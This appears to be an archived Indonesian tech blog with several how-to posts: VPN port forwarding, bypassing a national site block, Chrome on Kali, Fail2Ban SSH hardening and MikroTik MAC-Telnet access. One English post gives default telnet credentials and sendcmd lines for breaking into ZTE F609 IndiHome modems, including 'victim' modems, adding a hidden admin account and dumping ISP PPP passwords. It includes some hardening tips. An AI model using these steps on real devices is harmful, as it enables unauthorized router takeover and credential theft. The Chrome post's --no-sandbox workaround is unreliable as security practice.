Thursday, 10 August 2017

Port Forward Windows tanpa IP Publik menggunakan tunnel.my.id


Kalian pernah ada keinginan untuk port forward komputer kalian agar bisa diakses dari internet tapi tidak punya ip publik? biasanya sih untuk kebutuhan server, back connect, atau untuk kebutuhan remote
Nah, kali ini saya akan membahas tentang bagaimana cara port forward tanpa perlu mengandalkan IP publik dari ISP, yaitu menggunakan layanan vpn dari tunnel.my.id

Sebelumnya, apakah kalian sudah tahu apa itu VPN? kalau belum, kalian bisa membaca sedikit penjelasan mengenai vpn disini. Tapi kali ini kita akan menggunakan tunnel VPN ini bukan untuk menghindari pemblokiran atau soal keamanan tapi untuk mem-forward local port kita agar bisa di akses  melalui internet. Dan kali ini kita akan menggunakan layanan dari tunnel.my.id

Apa itu tunnel.my.id?

Friday, 16 June 2017

Alternatif Bypass Internet Positif untuk Akses KumpulBagi


Kumpulbagi merupakan situs filehosting sekaligus berbagi file yang sekarang beralamatkan di www.kbagi.com dan konsepnya hampir sama dengan Tusfiles, 4shared, Uptobox, dan lain sebagainya. Kumpulbagi memiliki tampilan yang ringan, berbeda dengan layanan filehosting lainnya. Selain itu kumpulbagi juga menggunakan bahasa Indonesia sehingga sangat memudahkan pengguna dari Indonesia. Namun sayangnya, saat ini akses ke kumpulbagi di blokir oleh Internet Positif (IPO-chan). Jadi pengguna perlu menggunakan cara-cara bypass IPO agar bisa mengakses kumpulbagi seperti mengganti file hosts windows, menggunakan proxy, memasang add on browser VPN, menginstall aplikasi VPN, dll. Kali ini saya akan membagikan alternatif bypass IPO dengan tanpa perlu install aplikasi pihak ketiga.

Sebelum ke tutorial, apa sih VPN itu?

VPN adalah singkatan dari Virtual Private Network, yang merupakan jaringan virtual yang memungkinkan satu komputer dengan komputer lainnya menggunakan akses internet dapat saling terhubung seolah-olah ada didalam satu jaringan LAN. VPN memungkinkan komputer-komputer didalam jaringan tersebut dapat saling berkomunikasi dengan aman, sehingga selain untuk bertukar data dengan aman, tidak jarang cara ini juga digunakan untuk "mengakali" pemblokiran terhadap suatu situs.

Oke, langsung ke tutorialnya
manfaat dari tutorial ini, kalian tidak perlu merepotkan diri dengan aplikasi pihak ketiga, kalian juga bisa download file dari kumpulbagi menggunakan IDM, dan tentunya ini free, tanpa iklan, bebas dari website ban (seperti menggunakan zenmate untuk mengunjungi myanimelist) dan keribetan-keribetan lainnya.

pertama kunjungi vpnbook.com, disana kalian akan disuguhi dengan pilihan pptp, openvpn, atau dedicated vpn.

karena kita butuh yang simpel, gratis, dan tanpa keribetan dari aplikasi pihak ketiga, pilih pptp 
pada pilihan pptp, kalian disuguhi beberapa server vpn/pptp yang bisa digunakan, 
pilih yang mendukung p2p downloading (kotak no 1), milih yang dikotak nomor 2 juga gak apa-apa sih, hehe


lalu buka control panel, network and sharing center, lalu klik set up new connection or network klik connect to a workplace/vpn klik use my internet connection (vpn).


masukkan alamat server pada kolom internet address, dan masukkan destination name sesuai keinginan kalian, centang don't connect now jika kalian tidak ingin langsung menyambung ke VPN

setelah itu, masukkan username dan password yang sudah disediakan di situs vpnbook, centang remember this password agar kalian tidak perlu memasukkan password lagi saat menyambung ke vpn ini, lalu klik create/connect 

untuk menyambungkan lagi, kalian hanya perlu membuka taskbar->internet (bagi pengguna windows 7), klik pada nama vpn yang telah dibuat, klik connect->connect

sekian trik dari saya, kurang lebih, kritik saran, bisa kalian lemparkan ke kolom komentar dibawah
oiya, saya menghargai sekali apabila kalian mencantumkan sumber ketika kalian meng-copy paste tulisan ini :D

ps:
*password dari vpn dapat berubah sewaktu-waktu, jadi jika kalian gagal menyambung ke jaringan, kalian bisa cek passwordnya secara langsung di vpnbook.com, lalu memasukkan kembali pada saat proses menyambungkan ke vpn dan jangan lupa save agar tidak perlu memasukkan password lagi pada saat menyambung ke vpn
** lebih bagus lagi kalau kalian punya vpn sendiri, entah menyewa atau server punya saudara :3
*** ini speed download punya saya ketika menyambung ke server euro214 ^pamer^

ref:
http://khaerryanwar.blogspot.co.id/2015/09/vpn-pengertian-fungsi-manfaat-dan-cara.html
http://adhencandra28.blogspot.co.id/2014/11/apa-itu-kumpulbagicom.html

Sunday, 23 April 2017

Exploit, Create New Admin User, and Find Telkom Password through Telnet on IndiHome Modem (ZTE F609)

Hello everyone, in this post i wanna show you all how to exploit, create new admin user, and find telkom user's password on IndiHome Modem (ZTE F609)

This modem (ZTE F609) was usually used by telkom for their indihome product which based on Fiber Optic Communication. Indihome allows home user can use internet faster than older product

As we know, ZTE F609 has a well-known vulnerability. that was default telnet user and password which can easily be exploited.

With that vulnerability, you can do everything inside the modem such view, change, and editing modem's user, peeking into modem's configuration, and many more.

Ok then, let's go to the main action


A. Exploit and Login into ZTE F609 through Telnet

First, if you were using windows and want to be easy to use telnet, you need to download Putty here, if you use linux distros, i wont teach you how to use telnet, you has more knowledge than me.  xP

Then, open your putty, fill host address with your (or your victim) modem's IP, don't forget to change connection type to Telnet, and click "Open"

After that, you will see a window which ask you to fill user and password login. Fill it with this
Login : root 
Password : Zte521 

And voila, you already logged into ZTE F609, then let's do the next action.


B. View and Create new modem's Administrator User

Before you create new administrator user, you should see all modem's users, you can do it with type this command
sendcmd 1 DB p DevAuthInfo

 now you can see all modem's users, and learn their data pattern.

If you still want to create new administrator user, you can type this commands
sendcmd 1 DB addr DevAuthInfo
sendcmd 1 DB set DevAuthInfo 6 ViewName "IGD.AU7"
sendcmd 1 DB set DevAuthInfo 6 AppID "1"
sendcmd 1 DB set DevAuthInfo 6 User "dely"
sendcmd 1 DB set DevAuthInfo 6 Pass "iamnozarc"
sendcmd 1 DB set DevAuthInfo 6 Level "1"
sendcmd 1 DB set DevAuthInfo 6 Enable "1"
And voila, you already created new administrator user with "dely" as the username and "iamnozarc" as the password.
*ps: you can change user and password as your own desire*

Then, try to login into your F609 web management with your new administrator user



C. View Telkom User and Password

If you are Indihome user, you need to know about your telkom user and password.

With knowing it you can anticipate any accident that damage your modem's PPP configuration (which contain your indihome user and password) such as reset by accident, bricked, struck by lightning, and many more.

Mostly, telkom technician will give you your telkom user and password when they are installing your internet.

But, what should do you do when you forgot or lost the password? you wanna ask them?, you probably won't do that.
Without ask them again, you can find it easily with peeking into ZTE F609 PPP configuration with this command
sendcmd 1 DB p WANCPPP

Now you can see your  telkom user and password on second row, and don't forget to save it.


D. Anticipate your IndiHome Modem (ZTE F609) being Touched

Sometime, Indihome users need to share their internet through wlan or ethernet because it can support their business such as cafe, internet cafe, public health center, etc.

But, modems that exposed to public network has a high risk to become exploited by anyone (actually i usually do this, haha).

So, if you wont them exploiting your modem, you should patch the hole on your modem.

As you can see in our first action, the hole of ZTE F609 is default telnet password. You can see the telnet configuration of ZTE F609 by typing this command
sendcmd 1 DB p TelnetCfg

Did you see default telnet password of ZTE F609?, then you should change it by type this command
sendcmd 1 DB set TelnetCfg 0 TS_UPwd "****"
You can replace that four blue asterisks with your own desired password.

Then reboot your modem, and try to login into your modem's telnet using old and new password.

***Update***I already tried to change telnet password and reboot, but the default password won't change, it back to the default. For now, i just can suggest you to try not to expose your modem easily to the public
***Update***
As commented by LuQman Hakim, if you want to change telnet password, you need one more command that is
sendcmd 1 DB save
My bad, I completely forgot about that command. Please forgive me xD


At last, your criticism and suggestion are very welcome.

And please remember, i wont be responsible for anything you do an the impact that you gain after read this article, do it with your own risk, because i'm not your father, so be careful

Thursday, 31 December 2015

Download Gammu.exe [SMS Gateway]


haloo... lama ga nulis blog nih, haha. langsung aja deh, pagi ini saya akan membagikan link download gammu nih. halah cuma gammu aja,,, di situs resminya kan ada.
oke, alasan saya membagikan link download ini (sedikit curhat yak :p) karena link download yang ada pada situs resmi gammu berisi gammu yang masih berupa sourcecode C, jadi harus dikompile dulu sedangkan saya malas ribet :v (yeah i'm lazyman) jadi saya cari link unofficialnya. tapi, eits ada tapinya, link-link unofficial yang saya dapat dari beragam blog berisi gammu yang tidak komplit, yah banyak masalah lah. so, setelah berhari-hari nyari dan sempet curhat ke dosen, ternyata beliau punya file gammu yg sesuai dengan keinginan pemalas saya :v, meskipun masih ada beberapa error yang masih harus di fix kan. sekian curhat saya, langsung aja ke link download gammu nya,saya sediain 3 pilihan filehosting nih. :D

Download Gammu.rar
[4shared] [GE.TT] [GDRIVE]

jika ada link yang mati, segera hubungi saya yah di FB, WA, BBM (bagi yang tau :p), atau kirim komentar di post ini.
tutorial? untuk tutorial nanti saya post di postingan berikutnya. so, tetap simak blog ini yak :D

Friday, 18 September 2015

Install Google Chrome di Kali Linux Sana ( 2.0 )


pertama, tambahkan dulu repositori google-chrome ke source.list anda dulu...
#wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
#echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list
#apt-get update 
lalu install google chrome dengan perintah
 #apt-get install google-chrome-stable
selesai deh :D
eh, tapi ketika ikonnya di klik kok gak muncul apa-apa?
oke, mari kita coba memanggil google-chromenya melalui terminal
#google-chrome-stable
ups ternyata tetap tidak jalan, sekarang kita coba lagi dengan menambahkan atribut "--no-sandbox"
#google-chrome-stable --no-sandbox
eh, malah error, tapi coba lihat lagi, ternyata errornya karena "--user-data-dir", coba saja tambahkan atribut tersebut pada pemanggilannya
#google-chrome-stable --no-sandbox --user-data-dir"
taraaa.... google-chrome telah terbuka. tapi masa harus buka console dulu sebelum buka google-chrome?,,, karena tidak mau repot, kita modifikasi aja perintah google-chromenya dengan menambahkan attribut tadi ke /usr/bin/google-chrome
#gedit /usr/bin/google-chrome
 lalu tambahkan atributnya seperti berikut

save dan coba klik ikon google-chrome langsung :D

Saturday, 15 August 2015

Prevent SSH Brute Forcing With Fail2Ban on Debian Based Server

selamat siang entah waktu tempat pembaca saat ini adalah siang, pagi, sore ataupun malam  tapi waktu saya menulis ini adalah siang, hehe
sebenarnya artikel kali ini bukan hasil percobaan saya sendiri namun arsip dari blogwalking saya, daripada cuma diingat-ingat di otak lalu lupa, lebih baik saya share sekalian. jadi maaf, banyak didalam artikel ini adalah asil copy paste :D
langsung aja ke main artikelnya

login ke user root dan install fail2ban
#apt-get install fail2ban
setelah itu copy file konfigurasi default fail2ban-nya
#cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
setelah itu edit file konfigurasi jail.local sesuai keinginan pembaca
#nano /etc/fail2ban/jail.local
 Perhatikan pada bagian-bagian penting berikut ini :

  • ignoreip adalah bagian untuk memasukkan IP mana saja yang akan anda kecualikan (tidak bisa diblok), walaupun salah memasukkan password berkali-kali. Jika IP address yang ingin anda masukkan berjumlah lebih dari satu, silahkan pisahkan dengan spasi antara IP yang satu dengan yang lainnya.
  • bandtime adalah jumlah waktu sebuah IP akan diblokir dalam satuan detik. Biasanya secara default di bagian ini tertulis angka 600 yang berarti 10 menit. Silahkan anda sesuaikan dengan keinginan anda, jika angka 600 dirasa kurang tepat buat anda.
  • maxretry adalah jumlah percobaan yang dapat dilakukan oleh sebuah IP sebelum IP tersebut di blok. Jika disana tertulis 3, berarti setelah 3 kali salah memasukkan password, maka IP tersebut akan otomatis terblok. Silahkan anda edit bagian ini jika dirasa kurang pas. Semakin kecil angka yang dimasukkan, maka akan semakin kecil pula kesempatan brute force attack beraksi ke server anda.

  • destemail adalah bagian untuk memberikan laporan jika ada IP yang dicurigai telah berusaha melakukan serangan brute force. Silahkan ganti root@localhost dengan alamat email yang anda inginkan misalnya me@dedeerik.com, namun harap anda pastikan terlebih dahulu bahwa VPS anda sudah mempunyai mail server yang dapat digunakan untuk mengirim email ke mail server luar.
  • [ssh] berikut dropbear dan seterusnya kebawah bisa anda atur pada bagian enable = true menjadi false atau sebaliknya. True adalah pengaturan untuk mengaktifkan (ON) dan false untuk menonaktifkan (off). Untuk portnya bisa anda sesuaikan apabila anda sudah mengganti port default dari masing-masing layanan (open ssh, dropbear dan lain-lain). Seperti contoh, jika anda telah mengganti port SSH dari 22 ke 2200, maka pada bagian port tersebut silahkan isi dengan port 2200.
setelah pembaca selesai mengkonfigurasi fail2ban maka selanjutnya adalah merestart fail2ban
service fail2ban restart
untuk melakukan pengetesan pembaca dapat menggunakan perintah
fail2ban-client ping
 dan untuk melihat ssh login dan ip nya dapat dilihat dari /var/log/auth.log menggunakan text viewer kesayangan pembaca

Meremove/Unbanned IP yang telah terbanned oleh fail2ban
tujuannya agar ip tersebut dapat mengakses server ssh kembali
iptables -D fail2ban-ssh 1

----------------------------------------------------------------
source :
http://www.dedeerik.com/cara-install-fail2ban-di-ubuntu-dan-debian/
http://wahyudi-labs.blogspot.com/2014/09/konfigurasi-fail2ban-ssh-di-debian.html
http://www.unixmen.com/how-to-prevent-ssh-brute-force-attacks-with-fail2ban-on-debian-7/

Friday, 8 May 2015

Mengakses Mikrotik RouterOS/RouterBoard melalui MAC Address di Linux

Halo... saya kembali lagi haha, udah lama juga ga mengisi blog ini. kali ini saya sempat-sempatkan mengisi blog ini karena yah... mungkin hasrat ngeblog lagi tinggi-tingginya, apalagi setelah jum'atan biar varokah mas vroh :v. oke, kali ini saya akan menulis tentang permasalahan linux yang saya gunakan (Kali Linux) dengan router mikrotik nih, yah meskipun saya menggunakan Kali Linux tapi mungkin bisa diaplikasikan pada linux-linux lainya. oke lanjut ke paragraf selanjutnya

apa sih yang dimaksud mikrotik RouterOS/RouterBoard?. MikroTik RouterOS adalah sistem operasi dan perangkat lunak yang dapat digunakan untuk menjadikan komputer manjadi router network yang handal, mencakup berbagai fitur yang dibuat untuk ip network dan jaringan wireless, cocok digunakan oleh ISP dan provider hotspot. Untuk instalasi Mikrotik tidak dibutuhkan piranti lunak tambahan atau komponen tambahan lain. Mikrotik didesain untuk mudah digunakan dan sangat baik digunakan untuk keperluan administrasi jaringan komputer seperti merancang dan membangun sebuah sistem jaringan komputer skala kecil hingga yang kompleks sekalipun. sedangkan MikroTik RouterBoard adalah router embedded produk dari mikrotik. Routerboard seperti sebuah pc mini yang terintegrasi karena dalam satu board tertanam prosesor, ram, rom, dan memori flash. Routerboard menggunakan os RouterOS yang berfungsi sebagai router jaringan, bandwidth management, proxy server, dhcp, dns server dan bisa juga berfungsi sebagai hotspot server.

pada paragraf ini (halah, lama amat tutornya) saya menceritakan tentang bagaimana permasalahan kali linux saya dengan router mikrotik. jadi gini, untuk pengguna router mikrotik biasanya menggunakan aplikasi winbox untuk konfigurasi mikrotiknya. agar dapat mengakses mikrotik melalui winbox, pengguna disediakan 2 pilihan cara login, yang pertama via IP Address Mikrotik dan yang kedua via MAC Address Mikrotik. okelah kita dapat mengakses mikrotik dari winbox dengan login via ip address mikrotik, itu kalau ip address mikrotiknya udah di set, kalau belum?, nah karena ip address mikrotik belum di set (mungkin karena habis direset), maka kita bisa login via mac address mikrotik karena mac address sudah pasti ada / ter set pada NIC. lalu masalahnya dimana?, masalahnya ada pada winbox versi 3.x, yaitu jika dijalankan dilinux (pastinya pakai wine) tidak bisa mendeteksi mac address dari router yang terkonek via ethernet/eth0/LAN Ethernet (kalau di Windows sih bisa), untuk masalah pada ethernetnya kenapa saya masih kurang mengetahui, jadi mungkin anda-anda yang membaca bisa menambahkan dikomentar

(abaikan RO-FMIPA karena itu bukan punya saya, dan itu terdeteksi melalui interface wlan1 :v)

lalu, bagaimana caranya agar saya bisa mengakses mikrotik tersebut? atau setidaknya memberi IP address lah. sabar... kita akan tetap login ke Mikrotik via Mac Address namun tidak dengan menggunakan winbox tersebut, tapi menggunakan aplikasi MacTelnet. pertama, kita buat clone semua dari repo github tadi dengan command
#git clone https://github.com/haakonnessjoen/MAC-Telnet.git

dan pindah ke direktori MAC-Telnet, lalu kita install semua filenya dengan command
#make all install

then, saatnya untuk login ke mikrotik. untuk login ke mikrotik kita perlu men-set ip address eth0 kita
#ifconfig eth0 10.30.10.1 netmask 255.255.255.0

setelah itu kita mencari/memindai mac address dari mikrotik tersebut, kita pindai dengan command
#mndp

dan ditemukan mac mikrotik yang akan saya konfigurasi (milik saya) yaitu
4c:5e:c:8:8:b8    MikroTik (MikroTik 6.25 RB941-2nD)  up 0 days 0 hours  P72H-83SU

abaikan saja yang lain karena itu bukan milik saya, tapi milik kampus. andaikan saya tahu username ama passwordnya, router itu yang akan saya jadikan percobaan *eh, keceplosan.

sebelum kita konek ke mikrotik menggunakan mactelnet, ada baiknya jika kita mengetahui dan melihat syntax apa saja yang ada pada mactelnet yaitu dengan cara
#mactelnet -h

setelah melihat-lihat kita langsung saja kita konek ke mikrotiknya dengan command
#mactelnet eth0 4c:5e:c:8:8:b8 -n -u admin -p ruvaak

sedikit penjelasan:
eth0 = interface yang saya gunakan untuk konek ke mikrotik
4c:5e:c:8:8:b8 = mac address dari mikrotik yang tadi sudah ditemukan
-n = sytax ini agar mactelnet tidak mem-broadcast paket dan langsung ke mac address yg dituju, antisipasi dari gagal konek juga sih
-u admin = username mikrotik saya
-p ruvaak = password dari username mikrotik saya

taraa... sudah terkonek ke mikrotik, dan saatnya konfigurasi IP address agar kita dapat konek ke mikrotik menggunakan winbox. btw, semua command diatas itu dalam keadaan root loh, jadi hati-hati ya dan selamat berkreasi
sekian tutorial dari saya kali ini, jika ada salah mohon maaf dan koreksinya dari anda